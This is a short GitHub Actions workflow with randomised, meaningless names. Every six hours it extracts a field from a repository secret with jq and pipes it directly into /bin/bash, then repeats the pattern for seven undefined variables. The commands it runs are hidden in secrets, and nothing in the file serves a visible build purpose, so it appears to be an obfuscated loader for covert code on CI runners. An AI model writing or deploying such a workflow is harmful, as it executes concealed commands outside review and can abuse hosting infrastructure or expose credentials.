name: allowunaware
on:
  workflow_dispatch:
  schedule:
    - cron: '36 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: allowunaware
        env:
          o355: ${{ secrets.o355 }}
        run: |
          echo $o355 | jq -r .odu18 | /bin/bash
          echo $son32461 | jq -r .duqf513 | /bin/bash
          echo $unwrn29820 | jq -r .eahws5 | /bin/bash
          echo $eaiey2 | jq -r .abuy92 | /bin/bash
          echo $on769 | jq -r .hsav41580 | /bin/bash
          echo $zv61990 | jq -r .kgoxw0969 | /bin/bash
          echo $edf5188 | jq -r .whvrk243 | /bin/bash
          echo $x5205 | jq -r .zdx5 | /bin/bash

